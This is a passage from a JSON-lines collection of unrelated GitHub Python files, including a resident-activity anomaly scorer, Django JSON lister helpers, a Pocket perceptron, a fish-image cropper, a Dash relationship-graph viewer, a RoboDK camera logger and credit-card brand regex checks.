[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n globals()[\"mi\"+str(g+1)] = [4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,\n 4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000]\n \n#In this section, the datasets of the days should be entered in order\n for i in range(15):\n day = pd.read_csv('c://DAY_0'+str(i+1)+'.csv' , encoding = 'ansi')\n ts = sectable(day,resident)\n for w in range(27):\n for q in range(24):\n if ts[w][q] > globals()[\"ma\"+str(w+1)][q]:\n globals()[\"ma\"+str(w+1)][q] = ts[w][q]\n if ts[w][q] < globals()[\"mi\"+str(w+1)][q]:\n globals()[\"mi\"+str(w+1)][q] = ts[w][q] \n mintabl = [mi1,mi2,mi3,mi4,mi5,mi6,mi7,mi8,mi9,mi10,mi11,mi12,mi13,mi14,\n mi15,mi16,mi17,mi18,mi19,mi20,mi21,mi22,mi23,mi24,mi25,mi26,mi27]\n maxtabl = [ma1,ma2,ma3,ma4,ma5,ma6,ma7,ma8,ma9,ma10,ma11,ma12,ma13,ma14,\n ma15,ma16,ma17,ma18,ma19,ma20,ma21,ma22,ma23,ma24,ma25,ma26,ma27] \n return (mintabl , maxtabl)\n\ndef MaxMincheck(testday, resident):\n subNNC = 0\n st = sectable(testday, resident)\n mi , ma = MaxMin(resident)\n for p in range(27):\n for w in range(24):\n if st[p][w] < mi[p][w]:\n subNNC = 4 + subNNC\n if st[p][w] > ma[p][w]:\n subNNC = 2 + subNNC\n return subNNC\n\n#.............////////////////////..............\n\ndef TimeJob (daay, resident):\n \n for v in range(27):\n globals()[\"ac\"+str(v+1)] = [] \n for l in range(27):\n globals()[\"st\"+str(l+1)] = -1 \n t = 0 \n while t < 86400:\n z = t\n o = daay['r'+str(resident)][t]\n globals()[\"st\"+str(o)] = 1 + globals()[\"st\"+str(o)]\n globals()[\"ac\"+str(o)].append([z,1])\n globals()[\"ac\"+str(o)][globals()[\"st\"+str(o)]][1] = 1 + globals()[\"ac\"+str(o)][globals()[\"st\"+str(o)]][1]\n for a in range(z+1,86400):\n if daay['r'+str(resident)][a] == o:\n globals()[\"ac\"+str(o)][globals()[\"st\"+str(o)]][1] = 1 + globals()[\"ac\"+str(o)][globals()[\"st\"+str(o)]][1]\n if a == 86399:\n t = 86400\n else:\n t = a\n break\n t = t + 1\n\n acout = 
[len(ac1),len(ac2),len(ac3),len(ac4),len(ac5),len(ac6),len(ac7),len(ac8),len(ac9),len(ac10),\n len(ac11),len(ac12),len(ac13),len(ac14),len(ac15),len(ac16),len(ac17),len(ac18),len(ac19),\n len(ac20),len(ac21),len(ac22),len(ac23),len(ac24),len(ac25),len(ac26),len(ac27)]\n \n for m in range(27):\n globals()[\"tts\"+str(m+1)] = 0\n \n for g in range(27):\n h = globals()[\"ac\"+str(g+1)]\n for s in range(len(h)):\n globals()[\"tts\"+str(g+1)] = globals()[\"ac\"+str(g+1)][s][1] + globals()[\"tts\"+str(g+1)]\n \n ttsout = [tts1, tts2, tts3, tts4, tts5, tts6, tts7, tts8, tts9, tts10, tts11, tts12, tts13, tts14,\n tts15, tts16, tts17, tts18, tts19, tts20, tts21, tts22, tts23, tts24, tts25, tts26, tts27]\n \n return acout , ttsout\n \ndef numericalCheck (day, resident):\n subNNC = 0\n for v in range(27):\n globals()[\"c\"+str(v+1)] = 0 \n for f in range(27):\n globals()[\"s\"+str(f+1)] = 0\n for k in range(27):\n globals()[\"av\"+str(k+1)] = 0\n for d in range(27):\n globals()[\"mc\"+str(d+1)] = 0\n for s in range(27):\n globals()[\"mt\"+str(s+1)] = 0\n for s in range(27):\n globals()[\"mi\"+str(s+1)] = 90000\n#In this section, the datasets of the days should be entered in order\n for i in range(15):\n daaay = pd.read_csv('c://DAY_0'+str(i+1)+'.csv' , encoding = 'ansi')\n count , total = TimeJob(daaay,resident)\n for j in range(27):\n if count[j] > globals()[\"mc\"+str(j+1)]:\n globals()[\"mc\"+str(j+1)] = count[j]\n if total[j] > globals()[\"mt\"+str(j+1)]:\n globals()[\"mt\"+str(j+1)] = total[j]\n if total[j] > 0:\n if total[j] < globals()[\"mi\"+str(j+1)]:\n globals()[\"mi\"+str(j+1)] = total[j]\n if count[j] > 0:\n globals()[\"c\"+str(j+1)] = globals()[\"c\"+str(j+1)] +1\n globals()[\"s\"+str(j+1)] = globals()[\"s\"+str(j+1)] +total[j]\n for g in range(27):\n if globals()[\"c\"+str(g+1)] > 0 :\n globals()[\"av\"+str(g+1)] = globals()[\"s\"+str(g+1)]/globals()[\"c\"+str(g+1)]\n \n cnt , ttl = TimeJob(day,resident)\n for r in range(27):\n if ttl[r] > 0 and ttl[r] < globals()[\"mi\"+str(r+1)]:\n subNNC = subNNC + 1\n if cnt[r] > globals()[\"mc\"+str(r+1)]:\n subNNC = subNNC + 1\n if ttl[r] > globals()[\"mt\"+str(r+1)]:\n subNNC = subNNC + 1\n if ttl[r] > ((globals()[\"av\"+str(r+1)])*1.5):\n subNNC = subNNC + 1\n if ttl[r] < ((globals()[\"av\"+str(r+1)])*0.5):\n subNNC = subNNC + 1\n if (globals()[\"c\"+str(r+1)]) > 12 and cnt[r] < 1:\n subNNC = subNNC + 1\n if (globals()[\"c\"+str(r+1)]) < 3 and cnt[r] > 0:\n subNNC = subNNC + 1\n return subNNC\n#.............////////////////////..............\n\n#In this section, the datasets of the days should be entered in order\n\nfor i in range(15):\n globals()[\"df0\" + str(i+1)] = pd.read_csv('c://DAY_0'+str(i+1)+'.csv' , encoding = 'ansi')\n\nw0 = df01.append(df02, ignore_index=True)\nfor j in range(12):\n globals()[\"w\"+str(j+1)] = globals()[\"w\"+str(j)].append(globals()[\"df0\" + str(j+3)] , ignore_index=True)\n if j==11:\n dataR10 = globals()[\"w\"+str(j+1)].append(globals()[\"df0\" + str(j+4)] , ignore_index=True)\n dataR11 = globals()[\"w\"+str(j+1)].append(globals()[\"df0\" + str(j+4)] , ignore_index=True)\n dataR20 = globals()[\"w\"+str(j+1)].append(globals()[\"df0\" + str(j+4)] , ignore_index=True)\n dataR21 = globals()[\"w\"+str(j+1)].append(globals()[\"df0\" + str(j+4)] , ignore_index=True)\n\nprint(\"\\nWELCOME\\n\")\n\n## ------------------------------------------------------ Resident 1 --------------------------------------------------\n\ndt11 = tree.DecisionTreeClassifier(criterion='gini') \ny11 = dataR11.r1\ndataR11.drop(['r1'], axis=1 , 
inplace = True)\nx11 = dataR11\ndt11.fit(x11,y11)\n\ndt10 = tree.DecisionTreeClassifier(criterion='gini') \ny10 = dataR10.r1\ndataR10.drop(['r1'], axis=1 , inplace = True)\ndataR10.drop(['r2'], axis=1 , inplace = True)\nx10 = dataR10\ndt10.fit(x10,y10)\n\nsubNNC11 = []\nsubNNC21 = []\nsubNNC10 = []\nsubNNC20 = []\nsubNNC3 = []\nsubNNC4 = []\nsubNNC5 = []\n\n#In this section, the 16th to the 30th days are called for review\n\nfor daycounter in range(15):\n \n#sub-NNC for Resident 1, Considering the behavior of the resident 2 in the last 15 days:\n dataSetsNNC11 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC11 = randomcheck(dataSetsNNC11,1,11)\n subNNC11.append(sbNNC11)\n dataSetsNNC21 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC21 = checkpred(dataSetsNNC21,1,11)\n subNNC21.append(sbNNC21)\n \n#sub-NNC for Resident 1, Regardless of resident behavior 2 in the last 15 days:\n dataSetsNNC10 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC10 = randomcheck(dataSetsNNC10,1,10)\n subNNC10.append(sbNNC10)\n dataSetsNNC20 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC20 = checkpred(dataSetsNNC20,1,10)\n subNNC20.append(sbNNC20)\n\n dataSetsNNC3 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC3 = numericalCheck(dataSetsNNC3,1)\n subNNC3.append(sbNNC3)\n dataSetsNNC4 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC4 = MaxMincheck(dataSetsNNC4,1)\n subNNC4.append(sbNNC4)\n dataSetsNNC5 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC5 = norm(dataSetsNNC5,1)\n subNNC5.append(sbNNC5)\n\n#************************************************ FINAL NNC FOR RESIDENT 1 ************************************************ \n\nDailyNNC1 = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\nfor i in range(15):\n DailyNNC1[i] = subNNC11[i]+subNNC21[i]+subNNC10[i]+subNNC20[i]+subNNC3[i]+subNNC4[i]+subNNC5[i]\nNNC1 = np.mean(DailyNNC1)\nfor i in range(15):\n if DailyNNC1[i] > (NNC1*1.3):\n print(\"on\",i+16,\"day Abnormal state was diagnosed for the Resident 1\")\n\n\nprint(DailyNNC1)\nprint(\"Final Average NNC for Resident 1 in the last 15 days : \",NNC1)\n\n#*************************************************************************************************************************\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"seyedkazemi/NNC","sub_path":"NNC-semicode-v1.py","file_name":"NNC-semicode-v1.py","file_ext":"py","file_size_in_byte":14275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"34681160389","text":"\"\"\"\nThe functions that adapts a queryset in JSONs to use by frontend\n\ncontains:\n user_lister\n requested_user_lister\n event_lister\n category_lister\n subcategory_lister\n product_lister\n transaction_lister\n donateIn_lister\n needRequest_lister\n\"\"\"\n\n\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom App1.Components.item_functions import *\n\n\ndef user_lister(user_queryset):\n user_json = {}\n for user in user_queryset:\n user_json[user.id] = user_item(user)\n\n return user_json\n\n\ndef requested_user_lister(needy_queryset, donator_queryset, pagination_params=None):\n if pagination_params:\n return error(\"TODO\", {\"message\": \"Have no pagination yet; coming soon\"})\n\n needy_json = user_lister(needy_queryset)\n donator_json = user_lister(donator_queryset)\n\n empty_needy = [0 if len(needy_json) else 1]\n empty_donator = [0 if len(donator_json) else 1]\n\n final_json = {\"success\": \"1\",\n \"empty_needy\": empty_needy[0],\n \"empty_donator\": empty_donator[0],\n \"pagination_params\": pagination_params,\n \"needy_set\": needy_json,\n \"donator_set\": donator_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef event_lister(event_queryset, pagination_params=None):\n \"\"\"\n it passes pagination params to front if exists\n \"\"\"\n # Create a json for an event:\n event_json = {}\n for event in event_queryset:\n event_json[event.id] = event_item(event)\n\n empty = [0 if len(event_json) else 1]\n final_json = {\"success\": \"1\",\n \"empty\": empty[0],\n \"pagination_params\": pagination_params,\n \"event_set\": event_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef category_lister(category_queryset):\n category_json = {}\n for category in category_queryset:\n category_json[category.id] = category_item(category)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(category_json) else 1][0],\n \"count\": len(category_queryset),\n # \"pagination_params\": pagination_params,\n \"category_set\": category_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef subcategory_lister(subcategory_queryset):\n subcategory_json = {}\n for subcategory in subcategory_queryset:\n subcategory_json[subcategory.id] = subcategory_item(subcategory)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(subcategory_json) else 1][0],\n \"count\": len(subcategory_queryset),\n # \"pagination_params\": pagination_params,\n \"subcategory_set\": subcategory_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef product_lister(product_queryset):\n product_json = {}\n for product in product_queryset:\n product_json[product.id] = product_item(product)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(product_json) else 1][0],\n \"count\": len(product_queryset),\n # \"pagination_params\": pagination_params,\n \"product_set\": product_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef transaction_lister(transaction_queryset):\n transaction_json = {}\n for transaction in transaction_queryset:\n transaction_json[transaction.id] = transaction_item(transaction)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(transaction_json) else 1][0],\n \"count\": len(transaction_queryset),\n # \"pagination_params\": pagination_params,\n \"transaction_set\": transaction_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef donateIn_lister(donates_queryset):\n donate_json = {}\n 
for donate in donates_queryset:\n donate_json[donate.id] = donateIn_item(donate)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(donate_json) else 1][0],\n \"count\": len(donates_queryset),\n # \"pagination_params\": pagination_params,\n \"donate_set\": donate_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef needRequest_lister(needRequest_queryset):\n needRequest_json = {}\n for needRequest in needRequest_queryset:\n needRequest_json[needRequest.id] = needRequest_item(needRequest)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(needRequest_json) else 1][0],\n \"count\": len(needRequest_queryset),\n # \"pagination_params\": pagination_params,\n \"needRequest_set\": needRequest_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n","repo_name":"ehsankarbasian/django_charity","sub_path":"Backend/App1/Components/lister_functions.py","file_name":"lister_functions.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
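Every lister above repeats the same payload shape with a different item function and key name; a hypothetical factory (not in the original module, reusing the Response/status imports the file already has) could generate them:

def make_lister(item_fn, set_key):
    def lister(queryset):
        items = {obj.id: item_fn(obj) for obj in queryset}
        return Response({"success": "1",
                         "empty": 0 if items else 1,
                         "count": len(items),
                         set_key: items},
                        status=status.HTTP_200_OK)
    return lister

# e.g. product_lister = make_lister(product_item, "product_set")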
+{"seq_id":"39181479223","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport time\nfrom numpy import loadtxt\n \n# check error Pocket \ndef check_errorP(w, x ,label):\n if int(np.sign(w.T.dot(x))) != label:\n return True\n else :\n return False\n \n# get num of total error in dataset \ndef sum_error(w, dataset):\n errors = 0\n for x, label in dataset:\n if check_errorP(w, x, label):\n errors += 1\n return errors\n\n# Pocket演算法實作\ndef pocket(dataset):\n w = np.zeros(3) \n iterp = 0\n premisclassified = sum_error(w,dataset)\n bestw = 0\n \n for iterp in range(0,100000):\n misclassified = None\n while True:\n x, label = random.choice(dataset) # random choose samples\n if check_errorP(w,x,label):\n x = np.array(x)\n w = w + label * x\n misclassified = sum_error(w,dataset)\n break\n \n if misclassified < premisclassified: # misclassified smaller than premisclassified\n bestw = w\n premisclassified = misclassified\n \n iterp = iterp + 1 \n #w = bestw\n if premisclassified == 0:\n break\n print(\"iter: %d , misclassified: %d , best misclassified: %d\" % (iterp,misclassified , premisclassified))\n if premisclassified == 0 :\n print(\"!!halt!! iter: %d , misclassified: %d , best misclassified: %d\" % (iterp,misclassified , premisclassified))\n else :\n print(\"!!iter done!! iter: %d , misclassified: %d , best misclassified: %d\" % (iterp,misclassified , premisclassified))\n print(\"Accuracy :\" , ((samples-premisclassified)/samples)*100, \"%\")\n return bestw , iterp \n\nif __name__ == '__main__': \n m, b = 3, 10 # set the value of m and b\n print(\"the num of total samples : \")\n samples = int(input()) # the num of samples\n x = np.arange(samples)\n y = m * x + b\n plt.plot(x, y,'-y',label = 'Original')\n half = int(samples / 2)\n data = np.load('dataset.npz')\n dataset = list(zip(data['a'],data['b'],data['c'])) \n dataset = list(zip(dataset,data['z']))\n x0 = data['a']\n xdata = data['b']\n ydata = data['c']\n label = data['z'] \n print(\"Pocket:\") \n start1 = time.time() \n wbest , iterp = pocket(dataset)\n end1 = time.time()\n print(\"num of iterations: \",iterp)\n print(\"執行時間:%f 秒\"% float(end1-start1))\n l = np.arange(samples)\n ap,bp = -wbest[1]/wbest[2], -wbest[0]/wbest[2]\n print(\"m: %f, b: %f\" % (ap,bp))\n plt.plot(l, ap*l + bp, 'g-',label = 'Pocket')\n plt.plot(xdata[:half], ydata[:half], '.', color='blue',label='positive')\n plt.plot(xdata[half:], ydata[half:], 'x', color='red',label='negative')\n plt.legend(loc='upper left');\n plt.show()\n","repo_name":"nianyinwu/Perceptron","sub_path":"Pocket.py","file_name":"Pocket.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"12481332825","text":"import cv2\nimport skvideo.io\nimport pandas as pd\nimport numpy as np\nimport tqdm\n\n\nspecies_list = ['species_fourspot',\n 'species_grey sole',\n 'species_other',\n 'species_plaice',\n 'species_summer',\n 'species_windowpane',\n 'species_winter']\ndf = pd.read_csv('../../data/training.csv')\n\ndef process_row(row,frame,class_name, display=False, bounding_pad=2):\n x1, x2, y1, y2 = map(int, row[['x1', 'x2', 'y1', 'y2']].as_matrix())\n length = row['length']\n if length < 100:\n delta = 50\n elif length >= 100 and length < 150:\n delta = 75\n elif length >= 150 and length < 200:\n delta = 100\n elif length >= 200 and length < 250:\n delta = 125\n elif length >= 250 and length < 300:\n delta = 150\n elif length >= 300 and length < 350:\n delta = 175\n else:\n delta = int(length//2)\n \n delta += bounding_pad\n mid_x = int(x1 + x2)//2\n mid_y = int(y1 + y2)//2\n max_y, max_x, ch = frame.shape\n start_x = max(0, mid_x-delta)\n start_y = max(0, mid_y-delta)\n end_x = min(mid_x+delta, max_x)\n end_y = min(mid_y+delta, max_y)\n \n image = np.copy(frame)\n cropped_image = np.copy(image)[start_y:end_y,start_x:end_x]\n \n if display:\n pass\n else:\n return cropped_image\n\ndef process_video(df, video_index,skip=None,display_frames=True):\n if type(video_index)==str:\n x = df[df['video_id']==video_index].dropna()\n else:\n videos = df['video_id'].unique()\n x = df[df['video_id']==videos[video_index]].dropna()\n m = x['video_id'].iloc[0]\n base_path = '../../data/train_videos/'\n x['species'] = x.apply(lambda row: row[species_list].argmax(), axis=1)\n max_frame = x['frame'].max()\n vid_generator = skvideo.io.FFmpegReader(base_path + m + '.mp4')\n counter = -1\n outer_counter = 0\n images = []\n for i, row in x.iterrows():\n target_frame = row['frame']\n for f in vid_generator.nextFrame():\n frame = f\n counter +=1\n if counter == target_frame:\n break\n if skip:\n if outer_counter % skip == 0:\n ret = process_row(row,frame,row['species'], display=display_frames, bounding_pad=20)\n else:\n ret = process_row(row,frame,row['species'], display=display_frames, bounding_pad=20)\n if display_frames == False:\n images.append(ret)\n outer_counter += 1\n return images\n\n\ntotal_counter = 0\nall_videos = videos = df['video_id'].unique()\nbase_im_folder = '../../data/binary_classification/fish/'\n\nfor video in tqdm.tqdm(all_videos):\n try:\n u = process_video(df, video, None, False)\n for img in u:\n fname = base_im_folder + '{}.png'.format(total_counter)\n total_counter+=1\n cv2.imwrite(fname, cv2.cvtColor(img, cv2.COLOR_RGB2BGR))\n except Exception as e:\n print(\"cant process {}\".format(video))\n pass\n\n\n\n","repo_name":"aditbiswas1/fish-detection","sub_path":"preprocess_data/generate_fish_for_binary.py","file_name":"generate_fish_for_binary.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"819045045","text":"import matplotlib\nmatplotlib.use('Agg')\nimport math\nimport dash\nimport dash_bootstrap_components as dbc\nfrom dash import dcc, html\nfrom dash.dependencies import Input, Output\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport io\nimport base64\n\n# Entity Class\nclass Entity:\n def __init__(self, name, type):\n self.name = name\n self.type = type\n self.relations = {}\n\n def add_relation(self, relation, target):\n if relation not in self.relations:\n self.relations[relation] = []\n if target not in self.relations[relation]:\n self.relations[relation].append(target)\n\n# Load CSVs\nrelationships = pd.read_csv('relationships.csv')\nparticipants = pd.read_csv('participants.csv')\n\n# Initialize entities from participants.csv\nentities = {row['Name']: Entity(row['Name'], row['Type']) for _, row in participants.iterrows()}\n\n# Populate relationships from relationships.csv\nfor _, row in relationships.iterrows():\n subject_type, relationship, object_type = row['SubjectType'], row['Relationship'], row['ObjectType']\n for entity_name, entity in entities.items():\n if entity.type == subject_type:\n for target_name, target in entities.items():\n if target.type == object_type:\n entity.add_relation(relationship, target_name)\n\n# Dash App\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])\n\nparticipants_options = [{'label': entity.name, 'value': entity.name} for entity in entities.values()]\nrelationship_options = list(set([rel for entity in entities.values() for rel in entity.relations]))\nrelation_types = relationships['RelationType'].unique()\n\napp.layout = dbc.Container([\n html.H1(\"Relationship Viewer\"),\n dbc.Row([\n dbc.Col([\n html.Label(\"Select Participants:\"),\n dcc.Dropdown(id='participants-dropdown', options=participants_options, multi=True, value=list(entities.keys())),\n ], width=4),\n dbc.Col([\n html.Label(\"Select type of relation:\"),\n dcc.Dropdown(id='relation-type-dropdown', options=[{'label': rel_type, 'value': rel_type} for rel_type in relation_types], multi=True),\n ], width=4),\n dbc.Col([\n html.Label(\"Select Relationships:\"),\n dcc.Dropdown(id='relationships-dropdown', multi=True, value=relationship_options),\n ], width=4),\n ]),\n dbc.Row([\n dbc.Col([\n dbc.Button(\"Run\", id=\"run-btn\", color=\"primary\", className=\"mt-2\")\n ], width=2)\n ]),\n dbc.Row([\n dbc.Col([\n html.Img(id='network-graph', className=\"mt-4\")\n ])\n ]),\n], fluid=True)\n\ndef generate_layout(G):\n pos = nx.spring_layout(G)\n for node, data in G.nodes(data=True):\n if data['type'] == 'Human':\n r = 2\n angle = hash(node) % 360\n pos[node] = (r * math.cos(math.radians(angle)), r * math.sin(math.radians(angle)))\n return pos\n\n@app.callback(\n Output('relationships-dropdown', 'options'),\n Output('relationships-dropdown', 'value'),\n Input('relation-type-dropdown', 'value')\n)\ndef filter_relationships_by_type(selected_relation_type):\n if not selected_relation_type:\n options = [{'label': rel, 'value': rel} for rel in relationship_options]\n return options, []\n filtered_relationships = relationships[relationships['RelationType'].isin(selected_relation_type)]\n available_relations = filtered_relationships['Relationship'].unique()\n options = [{'label': rel, 'value': rel} for rel in available_relations]\n return options, list(available_relations)\n\n@app.callback(\n Output('network-graph', 'src'),\n Input('run-btn', 'n_clicks'),\n Input('participants-dropdown', 'value'),\n 
Input('relationships-dropdown', 'value')\n)\ndef update_output(n_clicks, selected_participants, selected_relationships):\n    if n_clicks is None:\n        return dash.no_update\n\n    G = nx.DiGraph()\n    color_map = {\n        \"Human\": \"red\",\n        \"Food\": \"yellow\",\n        \"Animal\": \"blue\",\n        \"Pet\": \"orange\",\n        \"Toy\": \"green\",\n        \"Vehicle\": \"purple\"\n    }\n\n    for entity_name in selected_participants:\n        entity = entities[entity_name]\n        G.add_node(entity.name, type=entity.type)\n\n    for entity_name in selected_participants:\n        entity = entities[entity_name]\n        for relation, targets in entity.relations.items():\n            if relation not in selected_relationships:\n                continue\n            for target in targets:\n                if target in selected_participants:\n                    G.add_edge(entity.name, target, relation=relation)\n\n    pos = nx.shell_layout(G)  # or any other layout you prefer\n    node_colors = [color_map.get(data['type'], \"gray\") for node, data in G.nodes(data=True)]\n    labels = nx.get_edge_attributes(G, 'relation')\n\n    non_self_edges = [(u, v) for u, v in G.edges() if u != v]\n\n    # 1. Adjust label position for curved edges.\n    # This creates an offset for edge labels. The values can be fine-tuned for best visual result.\n    label_pos = {}\n    for u, v, data in G.edges(data=True):\n        if u != v:  # Only for non-self-edges\n            x0, y0 = pos[u]\n            x1, y1 = pos[v]\n            label_pos[(u, v)] = ((x0 + x1) / 2 + (y1 - y0) * 0.2, (y0 + y1) / 2 + (x0 - x1) * 0.2)\n\n    # 2. Color the labels based on the target node (object) of the edge.\n    label_colors = {(u, v): color_map[G.nodes[v]['type']] for u, v in non_self_edges}\n\n    edge_colors = [color_map[G.nodes[v]['type']] for u, v in G.edges() if u != v]\n\n    plt.figure(figsize=(10, 6))\n\n    # Draw the nodes and non-self-edges with the specified edge colors and curved arrows\n    nx.draw(G, pos, with_labels=True, node_size=2000, node_color=node_colors, font_size=10, width=2, alpha=0.6, edge_color=edge_colors, arrowsize=20, edgelist=non_self_edges, connectionstyle=\"arc3,rad=0.2\")\n\n    # Filter edge labels\n    filtered_labels = {(u, v): d for (u, v), d in labels.items() if u != v and u in pos and v in pos}\n\n    # Filter the label_colors to match the filtered_labels\n    filtered_label_colors = [label_colors[edge] for edge in filtered_labels.keys()]\n\n    for edge, color in zip(filtered_labels.keys(), filtered_label_colors):\n        label = filtered_labels[edge]\n        x, y = pos[edge[0]]\n        x2, y2 = pos[edge[1]]\n        x_avg, y_avg = (x + x2) / 2, (y + y2) / 2  # Midpoint of the edge\n\n        plt.text(x_avg, y_avg, label, color=color)\n\n    buf = io.BytesIO()\n    plt.savefig(buf, format=\"png\")\n    buf.seek(0)\n    base64_image = base64.b64encode(buf.getvalue()).decode('utf-8')\n\n    return \"data:image/png;base64,{}\".format(base64_image)\n\nif __name__ == \"__main__\":\n    app.run_server(debug=True, port=8050)","repo_name":"PedroNVSRamos/relationships-visualization-rug","sub_path":"relationships.py","file_name":"relationships.py","file_ext":"py","file_size_in_byte":6848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
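A minimal stand-alone rerun of the figure-to-data-URI pipeline the callback ends with (the plotted data is a placeholder):

import base64
import io

import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt

plt.figure()
plt.plot([0, 1], [0, 1])
buf = io.BytesIO()
plt.savefig(buf, format="png")
buf.seek(0)
src = "data:image/png;base64,{}".format(base64.b64encode(buf.getvalue()).decode('utf-8'))
print(src[:40], "...")  # this string is what the html.Img src receives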
+{"seq_id":"16439041057","text":"\nfrom robodk import robolink \nfrom robodk import robomath \nimport numpy as np\nimport cv2 as cv\nimport os\nimport pandas as pd\n\n\nif __name__ == '__main__':\n RDK = robolink.Robolink()\n CAM_NAME = 'My Camera'\n CAM_PARAMS = 'SIZE=640x480'\n WINDOW_NAME = 'My Camera Feed'\n BASE_PATH = '/Users/akshitshishodia/tracker/roboDK /test2/test'\n data = pd.DataFrame(columns=['name','joint_pose'])\n cnt = 0 \n\n\n inventory = RDK.Item('inventory')\n cam_item = RDK.Item(CAM_NAME, robolink.ITEM_TYPE_CAMERA)\n if not cam_item.Valid():\n cam_item = RDK.Cam2D_Add(RDK.AddFrame(CAM_NAME + ' Frame'), CAM_PARAMS)\n cam_item.setName(CAM_NAME)\n cam_item.setParam('Open', 1)\n\n while cam_item.setParam('isOpen') == '1':\n\n img_socket = None\n bytes_img = RDK.Cam2D_Snapshot('', cam_item)\n joint_pose = inventory.Joints()\n\n if isinstance(bytes_img, bytes) and bytes_img != b'':\n nparr = np.frombuffer(bytes_img, np.uint8)\n img_socket = cv.imdecode(nparr, cv.IMREAD_COLOR)\n if img_socket is None:\n break\n name = str(cnt)+ \".png\"\n path = os.path.join(BASE_PATH,name)\n cv.imwrite(path,img_socket)\n data = data.append({'name':name,'joint_pose':joint_pose[0][0]},ignore_index = True)\n data.to_csv(\"name_and_pose2.csv\")\n cnt+=1\n cv.imshow(WINDOW_NAME, img_socket)\n\n\n\n cv.destroyAllWindows()\n RDK.Cam2D_Close(cam_item)\n","repo_name":"Akshit0601/Anomaly-Detection","sub_path":"roboDK /main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"18982530294","text":"import gym\nimport misc.controller as ctrl\nfrom misc.agents import learning, linear\nimport matplotlib.pyplot as plt\n\nenv = gym.make('CartPole-v0')\n\np = 0.5\nn = 1000\nn_average = 100\nrender = False\n\nagent_a = learning.LearningAgent(\n learning_type=learning.LearningType.MONTECARLO)\nagent_b = learning.LearningAgent(learning_type=learning.LearningType.QLEARNING)\nagent_c = linear.LearningLinearAgent()\na = ctrl.Controller(env, agent_a)\nb = ctrl.Controller(env, agent_b)\nc = ctrl.Controller(env, agent_c)\nc.run_episodes(n, render=render, p_noise=p)\na.run_episodes(n, render=render, p_noise=p)\nb.run_episodes(n, render=render, p_noise=p)\n\nya = a.stats.getRollingAverage(n_average)\nyb = b.stats.getRollingAverage(n_average)\nyc = c.stats.getRollingAverage(n_average)\nx = range(len(ya))\nplt.plot(x, ya, x, yb, x, yc)\nplt.title(\"p = 0.5\")\nplt.show()\n\n# env.close()\n","repo_name":"tdardinier/InterGP","sub_path":"src/temp/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37686218512","text":"import re\n\ndef is_hipercard(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 19:\n if re.match('^606282|3841\\d{2}',''.join(n[:6])):\n return True\n return False\n\ndef is_dankort(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 19:\n if re.match('^(5019)\\d+$',n):\n return True\n return False\n\ndef is_bcglobal(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 19:\n if re.match('^(6541|6556)[0-9]{12}$',n):\n return True\n return False\n\ndef is_koreancard(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 19:\n if re.match('^9[0-9]{15}$',n):\n return True\n return False\n\ndef is_carteblanche(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), 